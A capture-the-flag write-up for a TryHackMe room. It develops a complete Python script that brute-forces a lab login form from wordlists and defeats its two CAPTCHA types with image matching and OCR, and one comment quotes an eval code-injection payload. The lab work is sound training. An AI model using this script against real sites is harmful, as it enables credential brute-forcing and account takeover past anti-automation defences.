CTF tryhackme capturereturns
In this room, we’ll see how to bypass 2 custom CAPTCHA systems using python
https://tryhackme.com/r/room/capturereturns
Login form analysis
- we need to bypass the security measures of a login form
- after a few failed login attempts, we get 2 types of CAPTCHA
- the first CAPTCHA system is about identifying a shape in an image
- the second CAPTCHA system is about solving a mathematical operation written as an image
- after solving 3 CAPTCHAs in a row, we can use the login form again
- after 3 failed login attempts, we have to solve the CAPTCHAs again
The shapes
- good news, the shapes are static (eg a circle will always have the same base64 value)
- an easy way to tell the images apart is to extract 3 substrings (one per shape), each of which appears in the base64 value of only one shape.
- example for the circle:
- get a CAPTCHA with a circle shape -> right click on it -> open image in new tab -> copy the URL -> paste it in a file “shapes/circle.txt”. Do the same for the other shapes
- copy a long enough string
head -c 300 ./shapes/circle.txt
- pick a part of the image value
- verify that it isn’t in the other shapes
grep "PeZ7dZ5+Z93w+cz4zDbSDstRZGnqOljqKFbiOYwWu49T6Mtg8" ./shapes/triangle.txt
grep "PeZ7dZ5+Z93w+cz4zDbSDstRZGnqOljqKFbiOYwWu49T6Mtg8" ./shapes/square.txt
- store the string, then repeat for the other 2 shapes
- after this, we can build a list of dictionaries
1 2 3 4 5
# One entry per shape: "unique" is a substring that only occurs in the
# base64 value of the image whose shape is "answer"
shapes_data = [
    {
        "answer": "circle",
        "unique": "PeZ7dZ5+Z93w+cz4zDbSDstRZGnqOljqKFbiOYwWu49T6Mtg8",
    },
    {
        "answer": "square",
        "unique": "TmpBGEDx7wKWoiS4ARtXYMMa3AwJsAQKXIMLcA92LoCGgrgCGhpsgfvu3IyveA",
    },
    {
        "answer": "triangle",
        "unique": "1icoweuEUzHY/IV/opz4Nc56C/vB39X5+C35OfoNH8d2/wWHa/fr",
    },
]
Extracting text from an image
Asking Llama 3 70b
- let’s get some help from a Llama 3 70b model
- alright! If that works we’re golden. Let’s first try with a local image
POC, extracting text from image
pip install requests beautifulsoup4 pillow pytesseract
- on Kali Linux, I also had to install these packages
sudo apt install tesseract-ocr libtesseract-dev -y
- first we generate a CAPTCHA with a mathematical operation -> right click on it -> open image in a new tab
- copy the base64 value that comes after "base64," in the image URL
- paste the string in base64.b64decode(…)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import base64
import requests
from bs4 import BeautifulSoup
from PIL import Image
import pytesseract
# Proof of concept: decode a base64 CAPTCHA image and read its text with OCR.
# The literal below is a truncated placeholder; paste the full base64 value.
img_data = base64.b64decode("iVBORw0KGgoA[.....]")

# Write the decoded bytes to disk so the image can be opened from a file
with open('temp.png', 'wb') as png_file:
    png_file.write(img_data)

# Load the image back and convert it to grayscale ('L' mode)
image = Image.open('temp.png').convert('L')

# Run Tesseract on the grayscale image and show what it recognised
text = pytesseract.image_to_string(image)
print(text)
- it works! The hardest part is done, now let’s just code the whole logic
Final script
- here’s the final code, heavily commented
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
#!/usr/bin/python
import base64
import io
import operator
import re
import sys
import time

import pytesseract
import requests
import urllib3
from bs4 import BeautifulSoup
from PIL import Image
# Login endpoint of the target machine
URL = "http://10.10.181.29/login"
# Timeout (in seconds) passed to every HTTP request
REQUEST_TIMEOUT = 0.3
# Stays True until the first login attempt has been replayed after a CAPTCHA round
first_request = True

# Initializing a session, shared by every request of the script
session = requests.Session()
data = {'username': '', 'password': ''}

# Read the wordlists (one candidate per line, line feeds removed).
# The context managers close the files as soon as they have been read.
with open('usernames.txt', 'r') as usernames_file:
    usernames = usernames_file.read().splitlines()
with open('passwords.txt', 'r') as passwords_file:
    passwords = passwords_file.read().splitlines()

# "unique" is a string found only in the base64 value of the image shape "answer", and not the other 2
shapes_data = [
    {"answer": "circle", "unique": "PeZ7dZ5+Z93w+cz4zDbSDstRZGnqOljqKFbiOYwWu49T6Mtg8"},
    {"answer": "square", "unique": "TmpBGEDx7wKWoiS4ARtXYMMa3AwJsAQKXIMLcA92LoCGgrgCGhpsgfvu3IyveA"},
    {"answer": "triangle", "unique": "1icoweuEUzHY/IV/opz4Nc56C/vB39X5+C35OfoNH8d2/wWHa/fr"},
]
# Solve an operation from text eg " 5+ 3" -> 8
# The OCR output is never handed to eval(): eval can execute any python code
# (cf eval("__import__('os').system('id')")), so the operands and the operator
# are parsed explicitly and dispatched to a fixed table of arithmetic functions.
# The '-' is placed first in the character class so it is a literal minus sign
# and not a range ('*-/' would also accept ',' and '.').
_OPERATION_SYNTAX = re.compile(r'(\d+)\s*([-+*/])\s*(\d+)')
_OPERATORS = {
    '+': operator.add,
    '-': operator.sub,
    '*': operator.mul,
    '/': operator.truediv,
}


def solve_operation(text):
    """Compute the first "<int> <op> <int>" operation found in *text*.

    Supported operators are +, -, * and / (true division, so the result of a
    division is a float). Returns the numeric result, or the string 'Error'
    when no operation can be parsed or when the operation divides by zero.
    """
    match = _OPERATION_SYNTAX.search(text)
    # We couldn't parse the operation (should never happen since the caller
    # only passes the part before '=')
    if match is None:
        print(f'Impossible to parse the operation {text}')
        return 'Error'

    left, symbol, right = match.groups()
    try:
        return _OPERATORS[symbol](int(left), int(right))
    except ZeroDivisionError:
        print(f'Impossible to parse the operation {text}')
        return 'Error'
# Send a post request until we get an HTTP 200 answer
def send_response(session, URL, data, timeout, ttype):
    """POST *data* to *URL* with *session*, retrying until the status is 200.

    session: object whose post() method is used to send the request.
    URL:     address the form data is posted to.
    data:    form fields to send.
    timeout: per-request timeout handed to session.post().
    ttype:   label printed when a request times out (the kind of request).

    Returns the first response whose status code is 200. The function loops
    forever while requests keep timing out or keep answering another status.
    """
    while True:
        try:
            # Use the caller's timeout rather than a module-level constant
            response = session.post(URL, data=data, timeout=timeout)
        # Filter the many kind of errors related to Timeout
        except (requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout,
                urllib3.exceptions.ReadTimeoutError, TimeoutError):
            print(f'Timed out {ttype}')  # Print the kind of requests we were doing
            continue

        if response.status_code == 200:
            return response
        print("A request wasn't successfull")
# Text present in the page for as long as the server asks for a CAPTCHA
CAPTCHA_MARKER = 'Detected 3 incorrect login attempts!'


def _solve_captcha(response):
    """Return (answer, captcha_type) for the CAPTCHA page in *response*.

    captcha_type is 'shape' or 'operation'. The script exits with status 1
    when the page holds no usable image or when the shape is not recognised.
    """
    soup = BeautifulSoup(response.content, 'html.parser')
    # Extract the base64 encoded image: the part of the src after the comma
    img_tag = soup.find('img')
    src = img_tag.get('src', '') if img_tag is not None else ''
    base64_img_data = src.partition(',')[2]
    if not base64_img_data:
        print('No CAPTCHA image found in the response!')
        sys.exit(1)

    # SHAPE SELECTION
    if 'Describe the shape below' in response.text:
        # The shape whose "unique" string is in the base64 value is the answer
        answer = next(
            (row["answer"] for row in shapes_data if row["unique"] in base64_img_data),
            '',
        )
        # We didn't find the shape (should never happen)
        if answer == '':
            print('Shape was not found!')
            print(base64_img_data)
            sys.exit(1)
        return answer, 'shape'

    # MATHEMATICAL OPERATION
    # Decode the image in memory (no temporary file) and convert it to grayscale
    image = Image.open(io.BytesIO(base64.b64decode(base64_img_data))).convert('L')
    # Perform OCR (Optical Character Recognition) using Tesseract
    operation = pytesseract.image_to_string(image)
    # Get the text before '=', we only want the operation, not '=?'
    operation = operation.split('=')[0]
    # solve_operation returns 'Error' when it cannot parse the text; that value
    # is submitted as-is and the CAPTCHA page is simply served again
    return solve_operation(operation), 'operation'


for user in usernames:
    for password in passwords:
        # Try a login request with a user/pass couple
        credentials = {'username': user, 'password': password}
        print(f'trying: {user} {password}')
        response = send_response(session, URL, credentials, REQUEST_TIMEOUT, "login")

        if CAPTCHA_MARKER in response.text:
            # Keep answering CAPTCHAs until the server stops asking for them
            while CAPTCHA_MARKER in response.text:
                answer, captcha_type = _solve_captcha(response)
                response = send_response(session, URL, {'captcha': answer},
                                         REQUEST_TIMEOUT, f'CAPTCHA {captcha_type}')

            # NOTE(review): as in the original script, the login is replayed
            # only after the very first CAPTCHA round; later rounds are assumed
            # to follow an attempt the server already rejected - confirm.
            if not first_request:
                continue

            print(f'repeat: {user} {password}')
            response = send_response(session, URL, credentials, REQUEST_TIMEOUT, "login repeat")
            first_request = False

        # Also reached after the replayed login, so that a valid first
        # user/pass couple is reported instead of being silently skipped
        if 'Error' not in response.text and CAPTCHA_MARKER not in response.text:
            print(f'SUCCESS: {user} --- {password}')
            sys.exit()
This post is licensed under CC BY 4.0 by the author.